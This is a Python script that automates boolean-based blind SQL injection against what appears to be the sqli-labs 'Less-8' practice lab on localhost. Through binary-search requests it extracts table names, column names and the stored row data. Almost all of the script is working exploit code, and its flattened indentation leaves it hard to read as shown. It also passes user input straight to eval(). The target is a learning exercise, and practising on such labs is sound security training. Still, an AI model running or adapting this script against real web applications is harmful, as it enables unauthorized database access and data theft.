import requests as req
url="http://127.0.0.1/sqli/Less-8/"
url_o=url
res=''
database_name=''
k=0
'''for i in range(8,100):
id=f"?id=1' and length(database())={i}--+"
url+=id
r=req.get(url=url)
if "You" in r.text:
print("数据库长为:",i)
break
url=url_o
url=url_o
for j in range(1,i+1):
max_num = 128
min_num = 48
while (min_num<=max_num):
mid=(max_num+min_num)//2
print(mid)
id = f"?id=1' and ascii(substr(database(),{j},1))>{mid}--+"
url+=id
r = req.get(url=url)
#print(url)
url=url_o
if "You" in r.text:
min_num=mid+1
else:
max_num=mid
if mid==(min_num+max_num)//2:
break
database_name+=chr(mid)
print(database_name)
url=url_o
print("数据库名为:"+database_name)
url=url_o'''
tablen=[0 for i in range(10)]
for k in range(0,10):
id = f"?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit {k},1))--+"
url += id
r = req.get(url=url)
url = url_o
if "You" in r.text:
for i in range(1,100):
id = f"?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit {k},1))={i}--+"
url += id
print('当前语句:'+url)
r = req.get(url=url)
url = url_o
if "You" in r.text:
tablen[k]=i
break
else:
break
for i in range(0,k):
print('表',i+1,'长度为',tablen[i],'\n')
tabname=['' for i in range(10)]
for i in range(0,k):
for j in range(1,tablen[i]+1):
max_num = 128
min_num = 32
while (min_num <= max_num):
mid = (max_num + min_num) // 2
id = f"?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {i},1),{j},1))>{mid}--+"
url += id
print('当前语句:'+url)
r = req.get(url=url)
url = url_o
if "You" in r.text:
min_num = mid + 1
else:
max_num = mid
if mid == (min_num + max_num) // 2:
break
tabname[i]+=chr(mid)
for i in range(0,k):
print('表',i,'名字为:'+tabname[i])
print('请输入要查询的表序号:')
tabnum=eval(input())
columnlen=[0 for i in range(10)]
for k in range(0,10):
id = f"?id=1' and length((select column_name from information_schema.columns where table_schema=database() and table_name='{tabname[tabnum]}' limit {k},1))--+"
url += id
r = req.get(url=url)
print(url)
url = url_o
if "You" in r.text:
for i in range(1,100):
id = f"?id=1' and length((select column_name from information_schema.columns where table_schema=database() and table_name='{tabname[tabnum]}' limit {k},1))={i}--+"
url += id
print('当前语句:' + url)
r = req.get(url=url)
url = url_o
if "You" in r.text:
columnlen[k]=i
break
else:
break
for i in range(0,k):
print('字段',i,'长度为',columnlen[i])
columnname=['' for i in range(10)]
for i in range(0,k):
for j in range(1,columnlen[i]+1):
max_num = 128
min_num = 32
while (min_num <= max_num):
mid = (max_num + min_num) // 2
print(mid)
id = f"?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='{tabname[tabnum]}' limit {i},1),{j},1))>{mid}--+"
url += id
print('当前语句:' + url)
r = req.get(url=url)
url = url_o
if "You" in r.text:
min_num = mid + 1
else:
max_num = mid
if mid == (min_num + max_num) // 2:
break
columnname[i]+=chr(mid)
for i in range(0,k):
print("字段",i,'名字为',columnname[i])
metadata=['' for i in range(10)]
for i in range(0,k):
print(columnname[i]+' ',end='')
print('\n')
for j in range(0,10):
metadata = ['' for i in range(10)]
id = f"?id=1' and ascii(substr((select {columnname[0]} from {tabname[tabnum]} limit {j},1),1,1))>1--+"
url += id
r = req.get(url=url)
url = url_o
if "You" in r.text:
for i in range(0, k):
for n in range(1,20):
id = f"?id=1' and ascii(substr((select {columnname[i]} from {tabname[tabnum]} limit {j},1),{n},1))>1--+"
url += id
r = req.get(url=url)
url = url_o
if "You" in r.text:
max_num = 128
min_num = 32
while (min_num <= max_num):
mid = (max_num + min_num) // 2
id = f"?id=1' and ascii(substr((select {columnname[i]} from {tabname[tabnum]} limit {j},1),{n},1))>{mid}--+"
url += id
r = req.get(url=url)
url = url_o
if "You" in r.text:
min_num = mid + 1
else:
max_num = mid
if mid == (min_num + max_num) // 2:
break
else:
break
metadata[i]+=chr(mid)
print(metadata[i]+' ',end='')
else:
break
print('\n')
(能用,但不知道改一下会不会出bug)